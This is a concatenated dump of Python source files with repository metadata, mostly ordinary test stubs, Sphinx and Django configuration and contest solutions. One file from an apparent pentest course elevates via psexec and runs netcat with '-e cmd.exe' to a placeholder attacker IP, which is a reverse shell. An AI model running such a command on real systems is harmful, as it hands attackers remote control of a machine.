Test case for asset_database_get_attribute_categories
Retrieve attribute categories for a given Asset Database.
"""
pass
def test_asset_database_get_by_path(self):
"""
Test case for asset_database_get_by_path
Retrieve an Asset Database by path.
"""
pass
def test_asset_database_get_element_categories(self):
"""
Test case for asset_database_get_element_categories
Retrieve element categories for a given Asset Database.
"""
pass
def test_asset_database_get_element_templates(self):
"""
Test case for asset_database_get_element_templates
Retrieve element templates based on the specified criteria. Only templates of instance type \"Element\" and \"EventFrame\" are returned. By default, all element and event frame templates in the specified Asset Database are returned.
"""
pass
def test_asset_database_get_elements(self):
"""
Test case for asset_database_get_elements
Retrieve elements based on the specified conditions. By default, this method selects immediate children of the specified asset database.
"""
pass
def test_asset_database_get_enumeration_sets(self):
"""
Test case for asset_database_get_enumeration_sets
Retrieve enumeration sets for given asset database.
"""
pass
def test_asset_database_get_event_frames(self):
"""
Test case for asset_database_get_event_frames
Retrieve event frames based on the specified conditions. By default, returns all children of the specified root resource with a start time in the past 8 hours.
"""
pass
def test_asset_database_get_referenced_elements(self):
"""
Test case for asset_database_get_referenced_elements
Retrieve referenced elements based on the specified conditions. By default, this method selects all referenced elements at the root level of the asset database.
"""
pass
def test_asset_database_get_security(self):
"""
Test case for asset_database_get_security
Get the security information of the specified security item associated with the asset database for a specified user.
"""
pass
def test_asset_database_get_security_entries(self):
"""
Test case for asset_database_get_security_entries
Retrieve the security entries of the specified security item associated with the asset database based on the specified criteria. By default, all security entries for this asset database are returned.
"""
pass
def test_asset_database_get_security_entry_by_name(self):
"""
Test case for asset_database_get_security_entry_by_name
Retrieve the security entry of the specified security item associated with the asset database with the specified name.
"""
pass
def test_asset_database_get_table_categories(self):
"""
Test case for asset_database_get_table_categories
Retrieve table categories for a given Asset Database.
"""
pass
def test_asset_database_get_tables(self):
"""
Test case for asset_database_get_tables
Retrieve tables for given Asset Database.
"""
pass
def test_asset_database_import(self):
"""
Test case for asset_database_import
Import an asset database.
"""
pass
def test_asset_database_remove_referenced_element(self):
"""
Test case for asset_database_remove_referenced_element
Remove a reference to an existing element from the specified database.
"""
pass
def test_asset_database_update(self):
"""
Test case for asset_database_update
Update an asset database by replacing items in its definition.
"""
pass
def test_asset_database_update_security_entry(self):
"""
Test case for asset_database_update_security_entry
Update a security entry owned by the asset database.
"""
pass
if __name__ == '__main__':
unittest.main()
| [
"eng@dstcontrols.com"
] | eng@dstcontrols.com |
1c5fedb67468760e5c3073345d8d2eb82b9228ea | 050ccac41c3b3b217204eb5871ca987f897b8d56 | /tradeorsale/apps/item/events.py | 0cef9d23f7d18247f34355e0ff52e24a94de8e5d | [] | no_license | marconi/tradeorsale | 6aefc7760f389aabd7e08fe40953914f5ea60abc | 6750260734f77cbf60c19ddddc83ebd27a5fb3a9 | refs/heads/master | 2021-01-23T20:21:24.210074 | 2013-01-12T09:05:09 | 2013-01-12T09:05:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | py | # # -*- coding: utf-8 -*-
# import logging
# from cornice import Service
# from sqlalchemy.orm.exc import NoResultFound
# from pyramid.i18n import TranslationString as _
# from tradeorsale.apps.item.models import Item
# from tradeorsale.libs.models import DBSession
# logger = logging.getLogger('tradeorsale')
# json_header = {'Content-Type': 'application/json'}
# event_service = Service(name='item_events', path='/items/events')
# VALID_ACTIONS = ('comment.created',)
# def validate_action(request):
# action = request.POST.get('action', None)
# if not action or action not in VALID_ACTIONS:
# request.errors.add('body', 'action', _(u'Invalid action'))
# def validate_item(request):
# try:
# item_id = int(request.POST.get('item_id', 0))
# try:
# DBSession.query(Item).filter_by(id=item_id).one()
# except NoResultFound:
# request.errors.add('body', 'item_id', _(u"Item doesn't exist"))
# except ValueError:
# request.errors.add('body', 'item_id', _(u'Invalid Item ID'))
# @event_service.post(validators=(validate_action, validate_item))
# def item_event_post(request):
# item_id = request.POST['item_id']
# action = request.POST['action']
# redis = request.registry.redis
# if action == 'comment.created':
# if not redis.hget('comments:counter', item_id):
# redis.hset('comments:counter', item_id, 1)
# else:
# redis.hincrby('comments:counter', item_id)
# return True
| [
"caketoad@gmail.com"
] | caketoad@gmail.com |
9d57ea2c53588e2cb3e350113d18909ff1eb8c5b | 3a0bbcf55a9150cfd2ead618012553741387447a | /doc/conf.py | 51b6e782bba28d581904ac53ebc2ea34baa701ce | [
"BSD-2-Clause"
] | permissive | mrgloom/pystruct | 3a086ceb5c64be689bdf7ece773e3428d903bcc2 | 08277d5a102e813958c9d76dd3fcc413ddb4889f | refs/heads/master | 2021-01-23T21:33:20.201433 | 2013-09-14T14:38:03 | 2013-09-14T14:38:03 | 12,946,517 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,771 | py | # -*- coding: utf-8 -*-
#
# pystruct documentation build configuration file, created by
# sphinx-quickstart on Fri May 3 17:14:50 2013.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('sphinxext'))
# -- General configuration ----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['gen_rst', 'sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.doctest', 'sphinx.ext.pngmath',
'sphinx.ext.viewcode', 'numpy_ext.numpydoc']
autosummary_generate = True
autodoc_default_flags = ['members', 'inherited-members']
# generate autosummary even if no references
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pystruct'
copyright = u'2013, Andreas Mueller'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', '_templates', '_themes']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'pystruct'
html_theme = 'bootstrap'
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['_themes']
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
#pystruct The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pystructdoc'
# -- Options for LaTeX output -------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('index', 'pystruct.tex', u'pystruct Documentation',
u'Andreas Mueller', 'manual'), ]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output -------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pystruct', u'pystruct Documentation',
[u'Andreas Mueller'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pystruct', u'pystruct Documentation', u'Andreas Mueller',
'pystruct', 'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Theme options are theme-specific and customize the look and feel of a
# theme further.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "PyStruct",
# Tab name for entire site. (Default: "Site")
#'navbar_site_name': "Site",
# A list of tuples containting pages to link to. The value should
# be in the form [(name, page), ..]
'navbar_links': [
('Introduction', 'intro'),
('Examples', 'auto_examples/index'),
('References', 'references'),
],
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 0,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "None",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing with "" (default) or the name of a valid theme
# such as "amelia" or "cosmo".
#
# Note that this is served off CDN, so won't be available offline.
#'bootswatch_theme': "united",
}
| [
"amueller@ais.uni-bonn.de"
] | amueller@ais.uni-bonn.de |
69825a5a9bffc35dd9540519400ec2f710db6246 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5670465267826688_1/Python/cvarad/abc.py | 1720f7c8ffacfd6974b6e997e64ca36d68e8cbc7 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,505 | py | mult = {('j', '1'): 'j', ('k', 'i'): 'j', ('1', 'j'): 'j', ('1', '1'): '1', ('k', 'j'): '-i', ('1', 'k'): 'k', ('k', 'k'): '-1', ('j', 'i'): '-k', ('k', '1'): 'k', ('i', 'j'): 'k', ('1', 'i'): 'i', ('i', 'k'): '-j', ('j', 'k'): 'i', ('i', 'i'): '-1', ('i', '1'): 'i', ('j', 'j'): '-1'}
def multiply(x, y):
if x[0] == '-' and y[0] != '-':
res = mult[x[1], y]
if res[0] == '-':
res = res[1]
else:
res = '-' + res
return res
if x[0] != '-' and y[0] == '-':
res = mult[x, y[1]]
if res[0] == '-':
res = res[1]
else:
res = '-' + res
return res
if x[0] == '-' and y[0] == '-':
return mult[x[1], y[1]]
return mult[x, y]
if __name__ == '__main__':
t = input()
for i in range(1, t+1):
l, x = map(int, raw_input().split())
s = raw_input()
if l*x < 3 or len(set(s)) == 1:
print "Case #" + str(i) + ": NO"
continue
if x <= 4:
s = s*x
found = 0
first = '1'
index = 0
for a in range(0, len(s)-2):
first = multiply(first, s[a])
if first == 'i':
found = 1
index = a
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
found = 0
first = '1'
for b in range(index+1, len(s)-1):
first = multiply(first, s[b])
if first == 'j':
found = 1
index = b
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
first = '1'
for c in range(index+1, len(s)):
first = multiply(first, s[c])
if first == 'k':
print "Case #" + str(i) + ": YES"
else:
print "Case #" + str(i) + ": NO"
else:
copy_s = s
s = copy_s*4
x -= 4
found = 0
first = '1'
index = 0
for a in range(0, len(s)):
first = multiply(first, s[a])
if first == 'i':
found = 1
index = a
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
if x >= 4:
s = s[index+1:] + copy_s*4
x -= 4
else:
s = s[index+1:] + copy_s*x
x = 0
found = 0
first = '1'
for b in range(0, len(copy_s)*4):
first = multiply(first, s[b])
if first == 'j':
found = 1
index = b
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
s = s[index+1:] + copy_s*(x%4)
first = '1'
for c in range(0, len(s)):
first = multiply(first, s[c])
if first == 'k':
print "Case #" + str(i) + ": YES"
else:
print "Case #" + str(i) + ": NO" | [
"eewestman@gmail.com"
] | eewestman@gmail.com |
1bea2d0ad3996f39218a58d6b1b0ab794fe1b9d9 | c00f701c7d4f765b1be9c0a1d68861551b063185 | /pages/admin.py | 9fd844fc98e431223bb9e097241c2404a0b613f6 | [] | no_license | Aditta-das/vege | f52921de10e492b775defc0f698cc784e011f1a9 | 881d99de1ae44787d504b1bb3647c873b7e7a32f | refs/heads/master | 2020-12-23T19:50:18.570462 | 2020-01-30T17:11:07 | 2020-01-30T17:11:07 | 237,255,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.contrib import admin
from .models import Detail, Comment
# Register your models here.
class Admin(admin.ModelAdmin):
list_display = ('id', 'title', 'category', 'is_stock', 'price')
list_display_links = ('id', 'title')
admin.site.register(Detail, Admin)
admin.site.register(Comment)
| [
"ndas5662@gmail.com"
] | ndas5662@gmail.com |
dccf38d64ab43cb8022c1097d9c82acdc491b23a | b09920ecdce8ab84df6a3b24b420d14c2c846078 | /GrantHolders/migrations/0002_auto_20201226_1723.py | fb6fab5051eec95566994b38a46b86eaa5c75baa | [] | no_license | BakdauletBolatE/sciense2020 | becdf64a3ecdfd35651b34cc045e09ee6ca804b9 | 4ed24162c056fc95bf8c02800116eddaf48c6387 | refs/heads/main | 2023-02-11T15:13:52.307403 | 2021-01-02T12:46:05 | 2021-01-02T12:46:05 | 324,537,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | # Generated by Django 3.1.4 on 2020-12-26 17:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('GrantHolders', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='grantholders',
name='poster',
field=models.ImageField(upload_to='graduate_img/', verbose_name='Грант иегерінің суреті'),
),
migrations.AlterField(
model_name='grantholders',
name='subject',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='GrantHolders.subject', verbose_name='Грант иегерінің пәні'),
),
]
| [
"bakosh21345@gmail.com"
] | bakosh21345@gmail.com |
657e83359651d28d59d3c8c43f3f9ecfd7ae5c7a | b45d66c2c009d74b4925f07d0d9e779c99ffbf28 | /tests/unit_tests/core_tests/service_tests/main_tests/test_main_retail_input_endpoints.py | 5b43f5ae98c9a1212f70f561e05c1f1ea8ed82b7 | [] | no_license | erezrubinstein/aa | d96c0e39762fe7aaeeadebbd51c80b5e58576565 | a3f59ba59519183257ed9a731e8a1516a4c54b48 | refs/heads/master | 2021-03-12T23:44:56.319721 | 2016-09-18T23:01:17 | 2016-09-18T23:01:17 | 22,665,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,352 | py | from core.service.svc_main.implementation.service_endpoints.retail_input_endpoints import RetailInputEndpoints
from core.service.svc_main.implementation.service_endpoints.endpoint_field_data import *
from common.helpers.common_dependency_helper import register_common_mox_dependencies
from common.utilities.inversion_of_control import dependencies, Dependency
import json
import mox
__author__ = 'vgold'
class RetailInputEndpointsTests(mox.MoxTestBase):
def setUp(self):
# call parent set up
super(RetailInputEndpointsTests, self).setUp()
# register mock dependencies
register_common_mox_dependencies(self.mox)
# get several dependencies that we'll need in the class
self.mock_main_access = Dependency("CoreAPIProvider").value
# Set mock attributes on WorkflowService instance for calls to record
self.mock = self.mox.CreateMock(RetailInputEndpoints)
self.mock.main_access = self.mox.CreateMockAnything()
self.mock.main_access.wfs = self.mox.CreateMockAnything()
self.mock.main_access.mds = self.mox.CreateMockAnything()
self.mock.main_param = self.mox.CreateMockAnything()
self.mock.em_access = self.mox.CreateMockAnything()
self.mock.excel_helper = self.mox.CreateMockAnything()
self.mock.cache_rec_options = {"has_metadata": True}
self.mock.store_helper = self.mox.CreateMockAnything()
self.mock.rir_helper = self.mox.CreateMockAnything()
self.mock.address_helper = self.mox.CreateMockAnything()
self.mock.WorkflowTaskGroup = self.mox.CreateMockAnything()
self.mock.CompanyInfo = self.mox.CreateMockAnything()
self.mock.SingleRirAdder = self.mox.CreateMockAnything()
self.mock.QCTaskCreator = self.mox.CreateMockAnything()
self.mock.RetailInputFileUploader = self.mox.CreateMockAnything()
self.mock.WorkflowNextTaskGetter = self.mox.CreateMockAnything()
# Set mock attributes on WorkflowService instance for calls to ignore
self.mock.cfg = Dependency("MoxConfig").value
self.mock.logger = Dependency("FlaskLogger").value
# Create caller context
self.context = {"user_id": 1, "source": "test_main_retail_input_endpoints.py",
"user": {"user_id": 1, "is_generalist": False},
"team_industries": ["asdf"]}
def doCleanups(self):
super(RetailInputEndpointsTests, self).doCleanups()
dependencies.clear()
##########################################################################
# RetailInputEndpoints.get_preset_retail_input_summary_collections()
def test_get_preset_retail_input_summary_collections(self):
request = self.mox.CreateMockAnything()
params = {"helo": "moto"}
request.args = {"params": json.dumps(params), "context": json.dumps(self.context)}
paging_params = {"paging_params": "paging_params"}
self.mock._format_page_and_sort_params(params, field_list = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS).AndReturn(paging_params)
query = {"query": "query"}
self.mock._format_query_from_field_filters(RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
params).AndReturn(query)
params = dict(paging_params, query = query, fields = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS)
data = "data"
self.mock.main_access.wfs.call_task_group_data(self.context, params).AndReturn(data)
self.mox.ReplayAll()
results = RetailInputEndpoints.get_preset_retail_input_summary_collections(self.mock, request)
self.assertEqual(results, data)
##########################################################################
# RetailInputEndpoints.post_retail_input_add_one_record()
def test_post_retail_input_add_one_record(self):
data = "data"
files = "files"
single_rir_adder = self.mox.CreateMockAnything()
self.mock.SingleRirAdder(data, files, self.context, async=True).AndReturn(single_rir_adder)
single_rir_adder.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.post_retail_input_add_one_record(self.mock, data, files, self.context, True)
self.assertEqual('a', results)
##########################################################################
# RetailInputEndpoints.post_retail_input_record_validation_create_qc()
def test_post_retail_input_record_validation_create_qc(self):
data = "data"
qc_task_creator = self.mox.CreateMockAnything()
self.mock.QCTaskCreator(data, self.context).AndReturn(qc_task_creator)
qc_task_creator.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.post_retail_input_record_validation_create_qc(self.mock, data, self.context)
self.assertEqual('a', results)
##########################################################################
# RetailInputEndpoints.post_retail_input_file_upload()
def test_post_retail_input_file_upload(self):
data = "data"
files = "files"
rif_uploader = self.mox.CreateMockAnything()
self.mock.RetailInputFileUploader(data, files, self.context).AndReturn(rif_uploader)
rif_uploader.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.post_retail_input_file_upload(self.mock, data, files, self.context)
self.assertEqual('a', results)
##########################################################################
# RetailInputEndpoints.get_preset_retail_input_record_validation_next_target()
def test_get_preset_retail_input_record_validation_next_target(self):
query = "query"
workflow_next_task_getter = self.mox.CreateMockAnything()
self.mock.WorkflowNextTaskGetter(query, self.context).AndReturn(workflow_next_task_getter)
workflow_next_task_getter.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.get_preset_retail_input_record_validation_next_target(self.mock, query, self.context)
self.assertEqual('a', results)
| [
"erezrubinstein@hotmail.com"
] | erezrubinstein@hotmail.com |
ab4579ae75158d64126150e2f72325a11f188034 | f0354782628e51b1a301eba1a69e9808b4adc664 | /Problem/10953.py | c854b9afe7a0477b5dc15917bcc5151a1dbed25a | [] | no_license | HyunIm/Baekjoon_Online_Judge | 9b289ea27440c150ef34372dc91e6f92f4102659 | f3a4670ea2b6ee81fa4b1bdcad3412cb995e64f2 | refs/heads/master | 2023-05-26T16:54:39.643360 | 2023-05-23T04:07:08 | 2023-05-23T04:07:08 | 119,958,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | T = int(input())
for _ in range(T):
A, B = map(int, input().split(','))
print(A+B)
| [
"hyunzion@gmail.com"
] | hyunzion@gmail.com |
7ec822625c92375e8d896e391d9e29f135d560bf | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/1016.py | ddf1fa1b653fea35088b6d3fe64db5a02aa39fff | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | # -*- coding: utf-8 -*-
f = open("A-small-attempt0.in")
T = int(f.readline())
for t in range(T):
a = int(f.readline())
for i in range(1, 5):
s = f.readline()
if i == a:
firstset = set(map(int, s.split(" ")))
b = int(f.readline())
for i in range(1, 5):
s = f.readline()
if i == b:
secondset = set(map(int, s.split(" ")))
dup = firstset & secondset
print "Case #%d:" %(t+1),
if len(dup) == 0:
print "Volunteer cheated!"
elif len(dup) == 1:
print dup.pop()
else:
print "Bad magician!"
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
94acf1ea1faefa3016f2d23ef45c62315e312dda | dbf76237e39087bf1a73243bbb019710182be0e4 | /Capitulo 2/28 - autoridade2.py | 0446ac6eb10b20550fa18cfc8fd429680b9e8601 | [] | no_license | sandromelobrazil/Python_Para_Pentest | 52edd86fa5929e0303e60e9872c027aae564becd | 1837b523ad55e1c8ca066341459714e2fc88f037 | refs/heads/master | 2020-04-05T16:56:22.342925 | 2018-11-11T00:52:23 | 2018-11-11T00:52:23 | 157,035,879 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | import ctypes
ctypes.windll.shell32.ShellExecuteW(None, u"runas", u"psexec.exe",
u"-accepteula -nobanner -s -d C:\\Users\\usuario\\Desktop\\nc.exe IP_do_atacante 666 -e cmd.exe", None, 0) | [
"sandromelo.brazil@gmail.com"
] | sandromelo.brazil@gmail.com |
2e24114040a5492d2a20aa1dd70e6205c6b0a72d | 806bf6a28854da12df7fad1deefa175f4e974ad6 | /visualization/c2.2.25.py | 6d7b77a2406ca6f0844169ce7bb3968c0b62250e | [] | no_license | qliu0/PythonInAirSeaScience | ba613e61ce331e5e2b4b5c0045f0223cde42718b | 1c8d5fbf3676dc81e9f143e93ee2564359519b11 | refs/heads/master | 2023-08-28T08:24:15.894918 | 2021-08-26T12:26:58 | 2021-08-26T12:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# lat_1、lat_2 分别是第一、二标准纬线
m = Basemap(width=12000000,height=9000000,\
resolution='l',projection='eqdc',\
lat_1=45.,lat_2=55,lat_0=50,lon_0=108.)
m.drawcoastlines()
m.fillcontinents(color='y',lake_color='c')
m.drawparallels(np.arange(-80.,81.,20.))
m.drawmeridians(np.arange(0.,361.,20.))
m.drawmapboundary(fill_color='c')
ax = plt.gca()
for y in np.linspace(m.ymax/20,19*m.ymax/20,9):
for x in np.linspace(m.xmax/20,19*m.xmax/20,12):
lon, lat = m(x,y,inverse=True)
poly = m.tissot(lon,lat,2.,100,\
facecolor='red',zorder=10,alpha=0.5)
plt.title("Equidistant Conic Projection")
plt.show()
| [
"queensbarry@foxmail.com"
] | queensbarry@foxmail.com |
afb3a5e9967dbe9b0e8519795602b3cb86d2e631 | 39fa2df1ab72444f3fe62d29c2dd146fbcdff564 | /test1/MyDjangoSite/myTest/views.py | 1b8c643053f6869de091845b2306c03bae1a14f1 | [] | no_license | gaozhidf/django | faa6c3f623075efc9c30f039ae93c8d02decb085 | 8526c2b33cc41dee9a636d126366990fb502834b | refs/heads/master | 2021-01-01T17:15:52.834568 | 2015-08-13T09:26:26 | 2015-08-13T09:26:26 | 40,441,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse, Http404
def hello(request):
return HttpResponse("Hello world")
def hello1(request, num):
try:
num = int(num)
HttpResponse("Hello world too")
except ValueError:
raise Http404() | [
"gaozhidf@gmail.com"
] | gaozhidf@gmail.com |
e0b92735daaf2063e1e568e4174e38dfd2c19568 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/twilio/build/lib/twilio/rest/api/v2010/account/conference/participant.py | b7979a9d6f17baa5d7fd2d1d56c1a25272656037 | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:517e39235cd9a18aa43315a0f2243a0b6f051535285cb71b5db98d5aec53da01
size 30162
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
3b15727e1ace910554d9e47e1fc36e68e74aabc0 | c2002f5451a52450db536088cf1f4beec9d23d7f | /0x1C-makefiles/5-island_perimeter.py | 8032bfe4825143c89eebadc851220ba5e6f3a2c5 | [] | no_license | JulianCanoDev/holbertonschool-low_level_programming | d23e10cb14d4cf5bffcb8601bb2e4a7eaf3c3038 | 6484d00870b0578a8acaba0ff125bf2e476828dc | refs/heads/master | 2021-07-12T21:10:35.513238 | 2021-06-22T22:25:17 | 2021-06-22T22:25:17 | 238,518,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/python3
"""
Defines an island perimeter measuring
"""
def island_perimeter(grid):
"""
Return the perimiter of an island
"""
width = len(grid[0])
height = len(grid)
edges = 0
size = 0
for i in range(height):
for j in range(width):
if grid[i][j] == 1:
size += 1
if (j > 0 and grid[i][j - 1] == 1):
edges += 1
if (i > 0 and grid[i - 1][j] == 1):
edges += 1
return size * 4 - edges * 2
| [
"juliancano.dev@gmail.com"
] | juliancano.dev@gmail.com |
661c565ec03275a3d21d78d26923358819478938 | b683c8f1942a1ab35062620c6013b1e223c09e92 | /Python-Files/Day-21/Question-87-alternative-solution-2.py | d1f23c21c0e660f4e332852acd43bab6779845c7 | [] | no_license | nihathalici/Break-The-Ice-With-Python | 601e1c0f040e02fe64103c77795deb2a5d8ff00a | ef5b9dd961e8e0802eee171f2d54cdb92f2fdbe8 | refs/heads/main | 2023-07-18T01:13:27.277935 | 2021-08-27T08:19:44 | 2021-08-27T08:19:44 | 377,414,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | """
Question 87
Question
With two given lists [1,3,6,78,35,55] and [12,24,35,24,88,120,155],
write a program to make a list whose elements are
intersection of the above given lists.
Hints
Use set() and "&=" to do set intersection operation.
"""
list1 = [1, 3, 6, 78, 35, 55]
list2 = [12, 24, 35, 24, 88, 120, 155]
set1 = set(list1)
set2 = set(list2)
intersection = set.intersection(set1, set2)
print(list(intersection))
| [
"noreply@github.com"
] | nihathalici.noreply@github.com |
Subsets and Splits
No community queries yet
